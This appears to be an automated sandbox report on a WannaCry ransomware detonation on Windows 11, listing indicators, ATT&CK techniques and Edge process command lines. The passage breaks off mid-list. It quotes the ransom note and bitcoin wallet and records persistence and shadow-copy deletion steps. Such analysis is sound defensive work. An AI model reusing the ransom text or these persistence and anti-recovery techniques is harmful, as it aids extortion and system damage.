wannacry | hxxp://pornhub[.]com

Analysis

max time kernel
203s
max time network
203s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
06/08/2024, 05:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://pornhub.com

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5022.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5038.tmp	WannaCry.EXE

Executes dropped EXE 12 IoCs

pid	Process
1196	WannaCry.EXE
3348	taskdl.exe
236	@[email protected]
2808	@[email protected]
3092	taskhsvc.exe
104	taskdl.exe
4444	taskse.exe
1648	@[email protected]
1812	@[email protected]
1472	taskdl.exe
232	taskse.exe
1076	@[email protected]

Loads dropped DLL 7 IoCs

pid	Process
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1160	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\duasouani680 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
20	camo.githubusercontent.com
20	raw.githubusercontent.com
87	camo.githubusercontent.com
95	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3007475212-2160282277-2943627620-1000\{C26F29BA-2B7B-4B9F-868F-D5E2A2BA3241}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3007475212-2160282277-2943627620-1000\{FA1EAC7C-82D0-4EE4-AE6C-2199EF2DD0F0}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
864	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4812	WINWORD.EXE
4812	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2688	msedge.exe
2688	msedge.exe
1656	msedge.exe
1656	msedge.exe
4612	msedge.exe
4612	msedge.exe
2084	identity_helper.exe
2084	identity_helper.exe
4672	msedge.exe
4672	msedge.exe
932	msedge.exe
932	msedge.exe
4492	msedge.exe
4492	msedge.exe
2988	identity_helper.exe
2988	identity_helper.exe
1224	msedge.exe
1224	msedge.exe
4736	msedge.exe
4736	msedge.exe
4844	msedge.exe
4844	msedge.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe
3092	taskhsvc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 31 IoCs

pid	Process
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe
Token: SeLoadDriverPrivilege	2788	WMIC.exe
Token: SeSystemProfilePrivilege	2788	WMIC.exe
Token: SeSystemtimePrivilege	2788	WMIC.exe
Token: SeProfSingleProcessPrivilege	2788	WMIC.exe
Token: SeIncBasePriorityPrivilege	2788	WMIC.exe
Token: SeCreatePagefilePrivilege	2788	WMIC.exe
Token: SeBackupPrivilege	2788	WMIC.exe
Token: SeRestorePrivilege	2788	WMIC.exe
Token: SeShutdownPrivilege	2788	WMIC.exe
Token: SeDebugPrivilege	2788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2788	WMIC.exe
Token: SeRemoteShutdownPrivilege	2788	WMIC.exe
Token: SeUndockPrivilege	2788	WMIC.exe
Token: SeManageVolumePrivilege	2788	WMIC.exe
Token: 33	2788	WMIC.exe
Token: 34	2788	WMIC.exe
Token: 35	2788	WMIC.exe
Token: 36	2788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe
Token: SeLoadDriverPrivilege	2788	WMIC.exe
Token: SeSystemProfilePrivilege	2788	WMIC.exe
Token: SeSystemtimePrivilege	2788	WMIC.exe
Token: SeProfSingleProcessPrivilege	2788	WMIC.exe
Token: SeIncBasePriorityPrivilege	2788	WMIC.exe
Token: SeCreatePagefilePrivilege	2788	WMIC.exe
Token: SeBackupPrivilege	2788	WMIC.exe
Token: SeRestorePrivilege	2788	WMIC.exe
Token: SeShutdownPrivilege	2788	WMIC.exe
Token: SeDebugPrivilege	2788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2788	WMIC.exe
Token: SeRemoteShutdownPrivilege	2788	WMIC.exe
Token: SeUndockPrivilege	2788	WMIC.exe
Token: SeManageVolumePrivilege	2788	WMIC.exe
Token: 33	2788	WMIC.exe
Token: 34	2788	WMIC.exe
Token: 35	2788	WMIC.exe
Token: 36	2788	WMIC.exe
Token: SeBackupPrivilege	2176	vssvc.exe
Token: SeRestorePrivilege	2176	vssvc.exe
Token: SeAuditPrivilege	2176	vssvc.exe
Token: SeTcbPrivilege	4444	taskse.exe
Token: SeTcbPrivilege	4444	taskse.exe
Token: SeTcbPrivilege	232	taskse.exe
Token: SeTcbPrivilege	232	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
1656	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe
932	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
4812	WINWORD.EXE
4812	WINWORD.EXE
4812	WINWORD.EXE
4812	WINWORD.EXE
4812	WINWORD.EXE
4812	WINWORD.EXE
4812	WINWORD.EXE
236	@[email protected]
236	@[email protected]
2808	@[email protected]
2808	@[email protected]
1648	@[email protected]
1648	@[email protected]
1812	@[email protected]
1076	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1656 wrote to memory of 4360	1656	msedge.exe	79
PID 1656 wrote to memory of 4360	1656	msedge.exe	79
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 5024	1656	msedge.exe	80
PID 1656 wrote to memory of 2688	1656	msedge.exe	81
PID 1656 wrote to memory of 2688	1656	msedge.exe	81
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82
PID 1656 wrote to memory of 4348	1656	msedge.exe	82

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1584	attrib.exe
2100	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://pornhub.com
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff956e73cb8,0x7ff956e73cc8,0x7ff956e73cd8
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2316 /prefetch:8
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2124 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,11840549301907521437,16182827442828792796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
